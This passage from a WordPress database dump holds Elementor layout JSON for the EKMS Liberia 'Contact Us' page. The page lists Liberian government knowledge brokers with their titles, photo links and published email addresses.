Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23417,3404,'_elementor_edit_mode','builder'),(23418,3404,'_elementor_template_type','wp-page'),(23419,3404,'_elementor_version','3.0.16'),(23420,3404,'_wp_page_template','default'),(23421,3404,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries 